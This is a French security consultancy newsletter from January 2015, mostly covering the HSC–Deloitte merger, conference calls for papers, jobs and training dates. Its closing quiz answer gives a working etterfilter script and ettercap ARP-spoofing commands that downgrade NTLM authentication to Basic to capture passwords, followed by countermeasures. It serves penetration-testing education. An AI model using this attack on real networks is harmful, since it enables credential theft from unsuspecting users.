[Newsletter HSC] N°125 - Janvier 2015

Newsletter d'information de HSC newsletter at hsc-news.com
Ven 30 Jan 10:06:59 CET 2015


========================================================================
              HSC Newsletter  --  N°125 --  janvier 2015
========================================================================



             « J'ai peur du passé, du présent, du futur, du passé simple
               et du plus-que-parfait du subjonctif. »

                                        [ Georges Wolinski ]





--[ Sommaire ]----------------------------------------------------------

      1. Éditorial
      2. Le saviez-vous ? Les réponses du mois dernier
      3. Le saviez-vous ? La question
      4. HSC et Deloitte France annoncent leur rapprochement
      5. HSC by Deloitte exposant au FIC 2015
      5. HSC sponsor des GS-DAYS 2015
      6. Appel à communication : Conférence annuelle du Club 27001 2015
      7. Appel à communication : GS-DAYS 2015
      8. Appel à communication : JSSI de l'OSSIR 2015
      9. Enquête annuelle de l'ISC2
     10. Offres d'emploi HSC by Deloitte : consultants débutants et séniors
     11. Agenda des interventions publiques
     12. Prochaines formations HSC
     13. Actualité des associations : Club 27001, OSSIR et Clusif
     14. Le saviez-vous ? La réponse



--[ 1. Éditorial ]--------------------------------------------------------


     HSC est désormais membre Deloitte, Deloitte Conseil est propriétaire
 d'Hervé Schauer Consultants, et Hervé Schauer est associé Deloitte.

     La période est à la reprise d'activité et le marché de la SSI est en
 mutation et restructuration. L'offre se concentre pour faire face aux
 nouveaux enjeux, de surveillance avec les SOC, de réponse aux incidents
 avec les CSIRTs, d'encadrement juridique avec la LPM, et de diversité entre
 la mobilité, les projets structurants IAM ou SIEM et les systèmes
 informatiques industriels.
 Rester seul, et petit n'est plus en phase avec la tendance de fond et
 tous les acteurs de taille similaire et supérieure à HSC sont sollicités,
 et en cours de discussion, pour s'adosser à plus gros qu'eux.
 Sans doute que des demandes de valorisation excessives freinent les
 annonces de rapprochement...

     HSC, en rejoignant Deloitte, maintient son expertise pointue, sa diversité
 de prestations, et reprend sa croissance, en maintenant tous ses engagements.
 Deloitte France est une entreprise française, dont les associés, qui en sont
 les propriétaires, sont français. Réseau mondial, Deloitte est selon Gartner
 le n°1 mondial de la sécurité des systèmes d'information. 

     En choisissant Deloitte, HSC va de l'avant pour mieux vous servir.

         Hervé Schauer



--[ 2. Le saviez-vous ? Les réponses du mois dernier ]-----------------

     Le mois dernier nous avions posé une question concernant le maintien d'un
 shell lorsque la connexion n'est pas stable. Nous proposions un script ruby
 relançant automatiquement la connexion sans tuer le programme lancé et nous
 vous proposions d'envoyer vos solutions si vous le souhaitiez.


 De nombreuses solutions proposent d'utiliser screen, tmux ou un équivalent.
 Ces solutions fonctionnent évidemment quand elles peuvent être utilisées. En
 effet, screen ou tmux nécessitent l'utilisation d'un accès tty au système
 obligeant d'avoir déjà un accès SSH ou équivalent, ce qui n'arrive pas
 toujours en test d'intrusion.

 D'autres solutions sont proposées à base de boucle bash ou d'utilisation de
 nohup pour ne pas arrêter l'exécution du shell. Ces solutions fonctionnent
 pour ne pas interrompre une commande mais ne permettent pas de continuer à
 interagir avec un programme interactif (mysql par exemple).

 Enfin une solution intéressante proposée par Nicolas Ruff est d'utiliser
 netcat en UDP pour éviter les problèmes de coupure de connexion de TCP.


 Merci à tous ceux qui nous ont répondu.



--[ 3. Le saviez-vous ? La question ]------------------------------------

 Vous êtes en test d'intrusion interne et vous avez réussi une attaque pour
 vous placer en homme du milieu sur le réseau. Vous parvenez alors à
 récupérer des requêtes HTTP d'une authentification NTLM. Cependant le mot
 de passe est robuste et vous n'arrivez pas à attaquer le challenge et à
 retrouver le mot de passe.

 Il existe un moyen de faciliter l'attaque pour récupérer le mot de passe, le
 connaissez-vous ?

     Réponse au paragraphe 14.



--[ 4. HSC et Deloitte France annoncent leur rapprochement ]------------
      
 Communiqué de presse du jeudi 11 décembre 2014

 Deloitte France annonce ce jour avoir finalisé le rapprochement avec Hervé
 Schauer Consultants (HSC), société de référence dans le conseil en sécurité
 des systèmes d'information.


 Créée en 1989, pionnière de la sécurité informatique en France, la société
 Hervé Schauer Consultants accompagne plus de 500 clients de toutes tailles
 et de tous secteurs d'activité (grands comptes, entreprises de taille
 intermédiaire, administrations centrales, collectivités territoriales,
 établissements de santé, etc.) en audit, conseil et formation.
 HSC est une référence sur les audits à forte composante technique (tests
 d'intrusion, revues de code, revues d'architecture), les audits
 réglementaires et contractuels (ARJEL, PCI DSS, ASIP-Santé, RGS), les
 investigations numériques (HSC est expert auprès de la cour d'appel de Versailles)
 et les audits de sécurité globaux de type « Red team », réalisés en conditions
 réelles en ayant recours aux techniques d'intrusion logique et physique et à
 l'ingénierie sociale.
 HSC accompagne également ses clients dans la mise en oeuvre de démarches de
 gestion de la sécurité de l'information et de la continuité d'activité, selon
 les méthodes et référentiels les plus reconnus du marché (ISO 2700X, EBIOS,
 RGS, ISO 22301, informatique et libertés, etc.) sur tous les sujets
 techniques, organisationnels et juridiques de la SSI.
 HSC est leader de la formation en SSI, avec le plus large programme du marché
 (43 formations différentes proposées, couvrant les aspects techniques,
 organisationnels et juridiques de la SSI). HSC est partenaire exclusif en
 France du SANS Institute et de l'ISC2.
 La société emploie une trentaine de collaborateurs, qui rejoignent une équipe
 Deloitte en France de plus de 170 collaborateurs spécialisés en gestion des
 risques SSI et un réseau mondial, leader en sécurité, de plus de 8000
 professionnels.

 « Fort d'une position de leader de la cybersécurité dans le monde, le
 rapprochement de Deloitte France avec HSC, acteur de référence en France,
 marque une volonté forte du cabinet de renforcer sa position sur le marché
 français en proposant l'expertise la plus élevée à nos clients. Le
 renforcement de notre compétence en cyberdéfense constitue un axe majeur de
 la stratégie de Deloitte en France, pour répondre à l'intégralité des enjeux
 les plus complexes de nos clients en terme de sécurité de l'information. »
 déclare Michel Elmaleh, Associé responsable Enterprise Risk Services chez
 Deloitte France.

 « Dans le prolongement des investissements déjà réalisés en matière de
 cybersécurité, marqués notamment par la mise en place du DLab en janvier
 2013, nous enrichissons avec ce rapprochement notre réponse aux nouveaux
 enjeux auxquels sont confrontés nos clients en matière de gestion des risques
 SI. La nouvelle équipe, ainsi constituée, ambitionne de devenir le partenaire
 stratégique privilégié des directions générales, des risques et de la sécurité
 des entreprises de toutes tailles en France. La maîtrise des enjeux
 techniques, organisationnels et réglementaires permet au cabinet de proposer
 une offre de gestion des risques SI complète et résolument tournée vers
 l'innovation et l'anticipation. Notre défi consistera également, dans un
 marché caractérisé par un besoin en très forte croissance d'experts sécurité,
 à développer la formation et accroître le niveau de sensibilisation des acteurs
 aux risques d'attaques et de malveillances tant en France qu'à
 l'international. »  déclare Marc Ayadi, Associé responsable IT Advisory chez
 Deloitte France.

 « Le rapprochement d'HSC et de Deloitte repose sur des valeurs et une vision
 partagée de nos métiers : exigence, excellence de service, qualité des
 collaborateurs et des expertises, mais aussi respect mutuel et esprit
 entrepreneurial auxquels nous sommes très attachés. Cette nouvelle étape
 permet à HSC d'accélérer son développement en bénéficiant de la forte
 implantation de Deloitte en France et de la force de son réseau
 international.» déclare Hervé Schauer, Associé Deloitte France et Directeur
 Général d'HSC.


 A propos de Deloitte

 Deloitte fait référence à un ou plusieurs cabinets membres de Deloitte Touche
 Tohmatsu Limited, société de droit anglais (« private company limited by
 guarantee »), et à son réseau de cabinets membres constitués en entités
 indépendantes et juridiquement distinctes. Pour en savoir plus sur la
 structure légale de Deloitte Touche Tohmatsu Limited et de ses cabinets
 membres, consulter www.deloitte.com/about. En France, Deloitte SAS est le
 cabinet membre de Deloitte Touche Tohmatsu Limited, et les services
 professionnels sont rendus par ses filiales et ses affiliés.

 Deloitte fournit des services professionnels dans les domaines de l'audit, de
 la fiscalité, du consulting et du financial advisory à ses clients des
 secteurs public et privé, quel que soit leur domaine d'activité. Fort d'un
 réseau de firmes membres dans plus de 150 pays, Deloitte allie des compétences
 de niveau international à un service de grande qualité afin d'aider ses
 clients à répondre à leurs enjeux les plus complexes. Nos 210 000
 professionnels sont animés par un même objectif, faire de Deloitte la
 référence en matière d'excellence de service. En France, Deloitte mobilise
 un ensemble de compétences diversifiées pour répondre aux enjeux de ses
 clients, de toutes tailles et de tous secteurs - des grandes entreprises
 multinationales aux microentreprises locales, en passant par les entreprises
 moyennes. Fort de l'expertise de ses 9000 collaborateurs et associés,
 Deloitte en France est un acteur de référence en audit et risk services,
 consulting, financial advisory, juridique & fiscal et expertise comptable,
 dans le cadre d'une offre pluridisciplinaire et de principes d'action en
 phase avec les exigences de notre environnement.


 Contacts Deloitte

 Sarah Panchbhaya
 Relations Presse Deloitte
 +33 155 614 169
 spanchbhaya at deloitte.fr

 Pauline Florentin
 Agence Rumeur Publique
 +33 155 745 210
 pauline at rumeurpublique.fr


 Contacts Hervé Schauer Consultants

 Hervé Schauer
 Relations Presse HSC
 +33 158 379 449
 Herve.Schauer at hsc.fr



--[ 5. HSC by Deloitte exposant au FIC 2015 à Lille ]---------------

     Venez rencontrer HSC lors du FIC 2015 à Lille sur le stand HSC by
 Deloitte n° C6.
 Pour les prestations, Adrien Pasquier mardi 20 et Jean-Jacques Cayet
 mercredi 21, et pour les formations Lynda Benchikh les deux jours, seront
 à votre disposition.

     Participation gratuite. Inscription en ligne obligatoire sur :
 https://www.forum-fic.com/2015/



--[ 6. HSC partenaire des GS-DAYS à Paris ]-------------------------

     HSC sera présent aux GS-DAYS le 24 mars prochain de 8h30 à 18h30 à
 l'Espace Saint-Martin (http://www.gsdays.fr/infos-pratiques/) au 199 bis,
 rue Saint-Martin, 75003 Paris. Notre équipe sera à votre disposition sur
 notre stand.

 Inscription obligatoire.

 Utilisez le code d'HSC pour vous inscrire : 55a92Lz et bénéficiez d'un
 tarif réduit de 130 euros HT au lieu de 160 euros HT.

 Programme complet et inscription :
 http://www.gsdays.fr/




--[ 7. Appel à communication : Conférence annuelle du Club 27001 ]-------

     Le Club 27001 (http://www.club-27001.fr/), association à but non
 lucratif, organise à Paris le mardi 24 mars 2015 sa huitième conférence
 annuelle autour des usages des normes ISO 2700X. Cette conférence se
 déroulera à Paris  à l'espace Saint-Martin dans le cadre des
 GS-DAYS (http://www.gsdays.fr).

 La conférence annuelle du Club 27001 privilégie les retours d'expérience
 dans l'utilisation des normes de la série ISO 27000, qu'il s'agisse de la
 mise en oeuvre d'une des normes, leur usage y compris sans certification,
 les difficultés rencontrées et les intérêts perçus.

     Voici les thèmes sur lesquels nous attendons des propositions, sans
 que ceux-ci soient exhaustifs :

  - Mise en oeuvre d'un SMSI
     . Retour d'expérience
     . Reprise de l'existant
     . Comment engager sa direction générale
     . Comment surmonter la peur du SMSI
  - Gestion des risques liés à la sécurité de l'information
     . Retour d'expérience de mise en oeuvre de l'ISO 27005
     . Technique d'entretien et d'implication des métiers
     . Échelles et calcul du risque
     . Interactions avec les autres gestions des risques : opérationnels,
       industriels, CHSCT, financiers, etc.
     . Intérêts de l'ISO 27005 dans les projets, les systèmes embarqués, etc.
     . Usage d'ISO27005 vs usage d'EBIOS, de Mehari ou de RiskIT
  - Versions 2013 des normes ISO27001 et ISO27002
  - Audits internes
     . Mise en place d'audits internes pour le SMSI
     . Mutualisation des audits internes ISO 27001 (avec ISO 9001, etc)
     . Utilisation de l'ISO 19011 et ISO 27006
  - Gestion des incidents liés à la sécurité
     . Retours d'expérience
     . Usage de l'ISO 27035
     . Liens avec d'autres référentiels (NIST SP800-61rev1, etc)
  - Indicateurs, métriques et tableaux de bord
     . Retours d'expérience
     . Usage de l'ISO 27004
     . Liens avec d'autres référentiels (TBSSI de l'ANSSI, NIST SP800-50, etc)
  - Liens entre ISO 27001 et d'autres normes, référentiels ou règlements :
     . Gouvernance de la SSI, de la sécurité en général, de l'IT, du management
       des risques
     . Systèmes de Management Intégrés (ISO 9001, 14001, 20000-1, etc) avec
       ISO 27001
     . Mutualisation, opposition, complémentarité, déclencheur, etc.
     . Cohabitation ISO27001 et ISO 20000-1 / ITIL (services informatiques),
       ISO 27013
     . Coordination entre la SSI (ISO 27001) et la continuité d'activité :
       ISO 22301 (SMCA), ISO 27031 et ISO 22313
     . CobiT (audit informatique, contrôle interne)
     . Utilisations d'ISO 27001 dans le cadre ou concomitamment à d'autres
       référentiels de sécurité : RGS, PCI-DSS, SoX, Bâle II/Solvency II,
       hébergeur de données de santé (agrément ASIP-Santé), ARJEL, WLA, etc.
     . Applications sectorielles de l'ISO 27001 : télécommunications,
       santé (27011, 27799, etc)
  - Certification ISO27001 et audits de SMSI
     . Retour d'expérience des accréditeurs, des organismes de certification,
       des auditeurs et des audités
     . Contrôle de l'appréciation des risques
     . Interprétations de la Déclaration d'Applicabilité
     . Mise à jour des normes d'audit et de certification (ISO 19011,
       ISO 17021, ISO 27006)

     Les propositions doivent faire part d'un retour d'expérience pratique,
 et ne doivent pas être la présentation d'une offre de service, d'un
 produit ou plus généralement d'une solution commerciale. Le comité de
 programme sera sensible à l'aspect pratique des propositions. Cependant, les
 propositions présentant une analyse ou un comparatif fondé sur des tests
 scientifiques pourraient être acceptées.

 Les présentations feront de 35 à 45 minutes et seront en français ou en
 anglais.

 Contenu des soumissions à envoyer à conference at club-27001.fr :
    - Nom de l'auteur, biographie et affiliation
    - Synopsis d'une page maximum de l'intervention avec un plan de celle-ci
    - Format libre

 Calendrier
    - 17 janvier 2015 : date limite de réception des soumissions
    - 31 janvier 2015 : notification aux auteurs et
                        publication du pré-programme
    - 28 février 2015 : publication du programme définitif
    - 10 mars 2015 : réception des présentations
    - 24 mars 2015 : conférence


 Le comité de programme est composé des membres de l'association élus au
 conseil d'administration, soit :
     - Bertrand Augé, Kleverware
     - Thomas Bousson, On'X-Edelweb
     - Claire Cossard, CNAM-TS
     - Francis Delbos, ID Nouvelles
     - Eric Doyen, Humanis
     - Emmanuel Garnier, Systalians
     - Loïc Guézo, Trendmicro
     - Thomas Lebouc, Ipanema
     - Florence Le Goff, Solucom
     - Carl Roller, Akamai
     - Hervé Schauer, HSC



--[ 8. Appel à communication : Conférence annuelle JSSI de l'OSSIR ]-----

     Participez à la JSSI 2015, événement sécurité organisé par l'OSSIR
 (Observatoire de la Sécurité des Systèmes d'Information et des Réseaux),
 qui se déroulera le mardi 10 mars 2015 de 8h30 à 17h30 à la Maison des
 Associations (MAS), 10 Rue des Terres au Curé, 75013 Paris

 Le thème central retenu pour la JSSI 2015 est :

     "Quel avenir pour la souveraineté française en SSI ?"

 La durée des interventions sera de 45 minutes (questions incluses). La
 journée de la sécurité des systèmes d'information s'articulera autour de
 conférences et de retours d'expérience autour du sujet ci-dessus.
 Seront privilégiées les propositions techniques et juridiques, issues
 d'une expérience concrète et/ou provenant de technologies innovantes.

     Dans le cadre du thème "Quel avenir pour la souveraineté française
 en SSI ?", les sujets suivants pourront entre autre être abordés :
  - Contexte réglementaire français (CNIL, RGS 2.0, LPM, Confidentiel
    Entreprise, PSTN, IGI 1300, OIV, SI Industriel...)
    et européen (Confidentiel UE...)
  - Quel label de sécurité pour les prestataires et les produits ?
    Français, européen ?
  - Solutions de sécurité françaises ou européennes
  - Sécurité chez les prestataires / hébergeurs / intégrateurs
  - Sécurité des solutions dans le Cloud
  - Portes dérobées et sécurité matérielle
  - Confiance dans les logiciels libres ou propriétaires
  - Cohabitation solutions étrangères / solutions françaises
  - En 2015, quel modèle pour la stratégie de défense en profondeur ?

     Si un sujet pertinent n'est pas présent dans cette liste, n'hésitez
 surtout pas à soumettre votre proposition.

 Des propositions d'intervention portant sur ces différents aspects de la
 sécurité sont sollicitées pour la JSSI 2015. Les interventions pourront
 inclure la présentation d'une démarche, d'une technique ou d'une solution
 de sécurité répondant à une problématique d'entreprise ou d'organisme public
 et être illustrées d'une expérience pratique de mise en oeuvre.
 Toute présentation strictement commerciale sera refusée.

     Les propositions de contribution sont attendues avant le 5 janvier 2015.
 Les propositions d'intervention, en français ou en anglais, précisant le
 sujet et le plan sur une page, doivent être accompagnées de quelques
 transparents et d'une brève biographie de l'auteur. Envoyez vos propositions
 dans l'un des formats : texte simple, PDF ou HTML, par e-mail à l'adresse :
 jssi15 at ossir.org

     Conférence organisée par l'OSSIR - Observatoire de la Sécurité des
 Systèmes d'Information et des Réseaux - Association loi 1901
 http://www.ossir.org



--[ 9. Appel à communication : GS-DAYS 2015  ]---------------------------

     La 6ème édition des GS Days se déroulera le 24 mars 2015 à l'Espace
 Saint-Martin au coeur de Paris, 199 bis, rue Saint-Martin, 75003 Paris.
 L'objectif des GS-Days, Journées francophones de la sécurité, est d'établir
 le dialogue entre le monde de la technique (administrateurs, experts
 sécurité), les RSSI, DSI et les décideurs. Ce colloque, exclusivement en
 français, propose dans un même espace plusieurs cycles de conférences et
 de démonstrations d'exploitation de faille informatique, sous un angle
 technique, organisationnel et juridique.

     Quelques exemples de thèmes sur lesquels nous attendons des soumissions :

 * Systèmes embarqués : objets connectés, systèmes industriels
    - Quelles attaques sur le matériel ?
    - Comment intégrer la sécurité dans ces équipements ?
    - Comment cloisonner le risque ?

 * Mobilité
    - Quelles politiques d'entreprise : BYOD ou COPE ?
    - Nouveaux usages connectés : domotique, m-payment, m-banking ?
    - Les nouvelles attaques orientées terminaux, applications des market
    - Quel niveau de sécurité pour les solutions de MDM ?
    - Quelles contre-mesures à apporter ?

 * Attaques ciblées de haut niveau
    - Synthèse de l'affaire Snowden
    - Arsenal des moyens d'attaques des Etats : matériel ou logiciel,
      botnets étatiques, DDOS
    - Quelle confiance dans les fournisseurs et matériel ?
    - Est-il possible de se protéger ?

 * Gouvernance de l'information 2.0
    - Risques et enjeux de la maîtrise et du partage de grande quantité
      d'informations : Cloud, Big Data, Data Mining
    - Quels enjeux pour le droit français et européen ?

 * Facteurs humains
    - L'ingénierie sociale au travers des réseaux sociaux et autres cercles
      de confiance
    - Nouveaux modes de sensibilisation : e-learning et serious game

 * Continuité et reprise d'activité
    - Quelle place pour l'ISO22301 ?
    - Comment gérer et communiquer une crise ?

 * Régulation
    - Quels effets de la Loi de Programmation Militaire (LPM), des nouvelles
      Directives Nationales de Sécurité (DNS), de la PSSI d l'Etat ?
    - Quels effets du RGSv2 pour les autorités administratives ?
    - Le droit peut-il encore quelque chose pour la protection de
      l'information ? Protection de la vie privée ? Secret des affaires ?

     Les présentations attendues devront proposer une vision technique ou
 scientifique. Les présentations à fin commerciale ou la présentation d'un
 produit ne seront pas acceptées. Cependant, les propositions présentant une
 analyse technique de la sécurité d'un produit, un comparatif fondé sur des
 tests scientifiques, et les retours d'expérience avec un aspect
 technologique, seront examinées avec attention.

 Le format des conférences sera de 50 minutes, dont 5 à 10 minutes de
 questions.

     Le comité de Programme est assuré par Global Security Mag, Florence
 Hanczakowski, CLUSIF, Hervé Schauer, HSC, Philippe Humeau, NBS System,
 Paul Such, SCRT, Olivier Revenu, EdelWeb, Maître Diane Mullenex, Cabinet
 Pinsent Masons, Eric Doyen, Vice-président du Club 27001, et Emmanuel Garnier,
 Systalians. Ce comité a pour objectif la sélection des conférenciers et
 du contenu du Colloque.

 Contenu des soumissions à envoyer à Marc.Jacob at globalsecuritymag.com :
    - Nom de l'auteur, biographie et affiliation
    - Catégorie de la soumission (technique/organisationelle/juridique)
    - Synopsis d'une à 2 pages de l'intervention avec un plan de celle-ci
    - Format PDF préféré.

  Calendrier
     - 9 janvier 2015 : date limite de réception des soumissions
     - 26 janvier 2015 : notification aux auteurs
     - 13 mars 2015 : réception des présentations définitives
     - 24 mars 2015 de 8h30 à 18h30 : conférence

 Inscription obligatoire déjà ouverte sur http://www.gsdays.fr/

 Utilisez le code d'HSC pour vous inscrire : 205Bax07, et bénéficiez d'un
 tarif réduit de 120 euros HT au lieu de 150 euros HT.



--[ 10. Offres d'emploi HSC pour consultants en sécurité & continuité ]--

     HSC recherche des consultants brillants, débutants ou expérimentés,
 avides de partager et de s'épanouir dans une équipe indépendante,
 pluri-disciplinaire, qui couvre tous les aspects liés à la sécurité et
 continuité, des tests d'intrusion à l'expertise judiciaire, de la
 rétroingénierie à la gouvernance, des systèmes industriels et embarqués à
 la gestion des risques, des technologies sans-fil à la résilience, de
 l'inforensique à l'ingénierie sociale, etc, pour des missions d'expertise
 variées et haut-de-gamme.

     Les ingénieurs sélectionnés pourront être formés à la sécurité par HSC
 (intrusion, inforensique, Windows, SCADA, ISO27001, ISO22301, ISO27005,
 EBIOS, etc.), soit 2 à 6 semaines de formations suivies dans le cadre de
 la prise de fonction.

     HSC recherche également des stagiaires pour des stages de pré-embauche.

     Tous les postes sont basés à Neuilly-sur-Seine (Paris), au pied du métro
 Pont de Neuilly (ligne n° 1). Si vous souhaitez proposer votre candidature,
 nous vous remercions d'envoyer votre CV en texte ASCII (pas de .doc ni .docx)
 par courrier électronique à cv at hsc.fr.



--[ 11. Agenda des interventions publiques ]------------------------------

 - 14 janvier 2015, - Panorama annuel de la cybercriminalité du Clusif -
   Paris, CCI de Paris
   Intervention d'Hervé Schauer
   http://www.clusif.fr/

 - 21 janvier 2015 - FIC 2015 - Lille
   Table-ronde ""Botnet takedowns"
   Intervention d'Hervé Schauer
   https://www.forum-fic.com/2015/

 - 2 avril 2015 - Security Day Luxembourg - Luxembourg
   Présentation technique en cours de confirmation.

 Retrouvez l'agenda de nos interventions publiques sur
 http://www.hsc.fr/conferences/agenda.html.fr



--[ 12. Prochaines formations HSC ]--------------------------------------

     Nos prochaines formations sont les suivantes :

 - Paris
        ISO 27005 Risk Manager    ..............    : 21 au 23 janvier 2015 (#)
        ISO 27001 Lead Implementer    ..........    : 26 au 30 janvier (#)
        Expert Sécurité Linux LPI 303   ........    : 26 au 30 janvier (*)(#)
        Essentiels de l'ISO27001:2013    .......    : 6 février
        Formation CISSP    .....................    : 2 au 6 mars (#)
        ISO 27001 Lead Auditor    ..............    : 16 au 20 mars (#)
        Tests d'intrusion avancés, exploits,
        hacking éthique (SANS SEC560 / GIAC GPEN)   : 16 au 20 mars (*)(#)
        Techniques de hacking, exploitation de failles
        et gestion des incidents (SEC504/GCIH)      : 23 au 27 mars 2015 (*)(#)
        Formation RSSI    ......................    : 30 mars au 3 avril
        Essentiels techniques de la SSI    .....    : 2 et 3 avril
        Correspondant Informatique et Libertés      : 8 au 10 avril (@)
        ISO 22301 Lead Auditor    ..............    : 13 au 17 avril (#)
        Fondamentaux & principes de la SSI
        (SANS SEC401/GIAC GSEC)   ..............    : 13 au 18 avril (*)(#)
        Inforensique Windows (SANS FOR408/GIAC GCFE): 20 au 24 avril (*)(#)
        PKI : principes et mise en oeuvre    ...    : 4 au 6 mai 2015 (*)
        Essentiels Informatique et Liberté   ...    : 18 mai
        Essentiels juridiques pour gérer la SSI     : 21 et 22 mai
        Sécurité du Cloud Computing    .........    : 26 au 28 mai
        Essentiel de PCI-DSS    ................    : 28 mai
        RGS : la SSI pour le secteur public    .    : 29 mai
        Inforensique réseau avancée (SANS FOR572)   : 1 au 5 juin 2015 (*)
        ISO 22301 Lead Implementer    ..........    : 8 au 12 juin (#)
        Mesures de sécurité ISO 27002:2013   ...    : 15 et 16 juin
        Indicateurs & tableaux de bord SSI/ISO27004 : 17 juin
        Gestion des incidents de sécurité/ISO27035  : 18 juin
        Gestion de crise IT/SSI    .............    : 19 juin 2015
        Risk Manager Avancé    .................    : 25 et 26 juin
        Essentiels de l'ISO22301    ............    : 11 septembre
        Protéger les applis web (DEV522 /GIAC GWEB) : 28 sep au 2 oct (*)(#)
        Analyse Inforensique avancée et réponse aux
        incidents (SANS FOR508 / GIAC GCFA)    .    : 2 au 6 novembre (*)(#)
        Sécurité du WiFi    ....................    : 9 et 10 novembre (*)
        Inforensique ordiphones/tablettes (FOR585)  : 16 au 20 novembre (*)(#)
        Tests d'intrusion avancés des applications
        web et hacking éthique (SANS SEC642)  ...   : 23 au 27 novembre (*)
        Sécuriser Windows (SANS SEC505/GIAC GCWN)   : 14 au 18 décembre (*)(#)

 (*) : formations avec travaux pratiques, avec un ordinateur par stagiaire
 (#) : formations certifiantes par LSTI, ISC2, GIAC ou LPI
 (@) : formation labellisée par la CNIL (www.cnil.fr)
 (C) : session de formation complète

 - Luxembourg
        ISO 22301 Lead Implementer    ..........    : 2 au 6 mars 2015 (#)
        Essentiels de l'ISO27001:2013    .......    : 24 avril
        Formation CISSP    .....................    : 18 au 22 mai (#)
        ISO 27005 Risk Manager    ..............    : 3 au 5 juin (#)
        ISO 27001 Lead Implementer    ..........    : 15 au 19 juin (#)

 - Lille
        Correspondant Informatique et Libertés      : 16 au 18 mars 2015 (@)

 - Lyon
        Correspondant Informatique et Libertés      : 4 au 6 mai 2015 (@)

 - Marseille
        Correspondant Informatique et Libertés      : 22 au 24 avril 2015 (@)

 - Rennes
        Correspondant Informatique et Libertés      : 8 au 10 juin (@)

 - Strasbourg
        Correspondant Informatique et Libertés      : 22 au 24 juin (@)

 - Toulouse
        Correspondant Informatique et Libertés .    : 21 au 23 janvier (@)
        ISO 27001 Lead Implementer    ..........    : 12 au 16 octobre (#)
        Correspondant Informatique et Libertés .    : 4 au 6 novembre (@)
        ISO 27005 Risk Manager    ..............    : 19 au 21 novembre (#)

 (#) : formations certifiantes
 (@) : formation labellisée par la CNIL (www.cnil.fr)

 HSC est certifiée OPQF (http://www.opqf.com/) et ISO9001 par Intertek sur
 ses formations.

 Pour tout renseignement ou inscription, contactez Lynda Benchikh :
 formations at hsc.fr -- +33 158 379 042

 Retrouvez le détail de nos formations (plan pédagogique, agenda) ainsi que
 notre catalogue 2015 en PDF sur http://www.hsc-formation.fr/



--[ 13. Actualité des associations : Club 27001, OSSIR et Clusif ]--------

  o Club 27001 (http://www.club-27001.fr/)
     . Prochaine réunion à Paris jeudi 23 janvier 2015 chez Solucom
         - "Le logiciel Score Compliance" par Thierry Ramard (Ageris)
         - Faites de propositions pour la secondes présentation
     . Prochaine réunion à Toulouse le vendredi 27 février au Mipih
         - Programme en cours de confirmation
     . Autres prochaines réunions annoncées sur
       www.club-27001.fr et dans les listes électroniques. Inscrivez-vous
       sur les listes de chaque ville sur www.club-27001.fr pour suivre
       l'activité du Club 27001 en région.

 o OSSIR (http://www.ossir.org/)
     . Prochaine réunion à Paris le mardi 10 février à l'INRIA
         - "HAVEX-RAT _ Toute l'histoire" par Giovanni Rattaro et Renaud Leroy
           (Openminded)
         - "À TOR et à travers : Etude du réseau d'anonymisation en 2015,
           utilisation et faiblesses" par Régis Senet (XMCO)
         - Revue de vulnérabilités
     . Conférence annuelle JSSI le 10 mars
     . Réunion suivante à Paris le mardi 14 avril à l'INRIA
         - "le skimming" par Thomas Souvignet et Matthieu Regnery (Gendarmerie
           - IRCGN)
         - seconde présentation en cours de confirmation
         - Revue de vulnérabilités
     . Prochaine réunion à Toulouse mardi 17 février
         - "Présentation et utilisation avancées de Mimikatz" par Benjamin
           Delpy
         - "Solution du Challenge SSTIC 2014" par Vincent Fargues (Thales)
     . Prochaine réunion à Rennes non planifiée.

 o Clusif (http://www.clusif.fr/)
     . Panorama annuel de la cybercriminalité le 14 janvier 2015
       http://www.clusif.fr/



--[ 14. Le saviez-vous ? La réponse ]------------------------------------

     Dans cette situation il faut profiter de notre position d'homme du milieu
 pour modifier le trafic à notre convenance.

 Lorsque le serveur envoie une demande d'authentification NTLM il le fait en
 répondant par un code d'erreur HTTP 401 et en ajoutant une en-tête HTTP
 "WWW-Authenticate" contenant la valeur NTLM.

 Cependant, il existe d'autres méthodes d'authentification HTTP. La méthode
 basic encode ainsi simplement le nom d'utilisateur et le mot de passe en
 Base64 permettant à un attaquant écoutant le réseau d'obtenir immédiatement
 le mot de passe de sa victime.
 
 L'attaque est donc simple. Lorsqu'une connexion HTTP est détectée, il suffit
 de modifier la méthode d'authentification de NTLM à basic pour que la victime
 envoie ses identifiants en clair sur le réseau. Le schéma suivant résume
 l'attaque.

192.168.1.15                     192.168.1.20                     192.168.1.37
   ------                          ---------                         -------
  |Client| =====================> |Attaquant|                       |Serveur|
   ------         GET / ...        ---------                         -------
                                              ====================>
                                                   GET / ...
                                              <====================
                                              401 Unauthorized
                                              WWW-Authenticate: NTLM
         <=====================
         401 Unauthorized
         WWW-Authenticate: basic
         =====================>
         		GET / ...
         Authorization: bGVzYXZpZXovdm91cz8K


 Concrètement, il est possible de réaliser cette opération en utilisant un
 script etterfilter dans ettercap. Le script suivant permet de modifier les
 requêtes souhaitées :
 
 if (ip.proto == TCP && tcp.src == 80) {
     if (search(DATA.data, "WWW-Authenticate: NTLM")) {
         replace("WWW-Authenticate: NTLM", "WWW-Authenticate: Basic");
     }
 }
 
 Il suffit ensuite de compiler le script et de l'utiliser, par exemple, dans le
 cas d'une attaque de type ARP spoofing créée par ettercap :
 
 etterfilter monScript.filter -o monScript.ef
 
 ettercap -T -q -F monScript.ef -M ARP /192.168.1.37/ /192.168.1.15/
 
 
 Cette attaque n'est qu'un des nombreux exemples d'attaques possibles pour un
 attaquant en position en homme du milieu. La première défense contre ce type
 d'attaque est bien entendu de mettre en place une protection contre l'ARP
 spoofing sur les switchs. Une autre contremesure est d'utiliser SSL pour ces
 échanges. Il est cependant important que la chaine de certificats soit valide
 puisque l'utilisation de certificats auto-signés ne pourra pas bloquer cette
 attaque dans la mesure ou l'utilisateur serait habitué à valider les exceptions
 de sécurité dans son navigateur. L'attaquant pourra générer un certificat et le
 faire valider par l'utilisateur.




Plus d'informations sur la liste de diffusion newsletter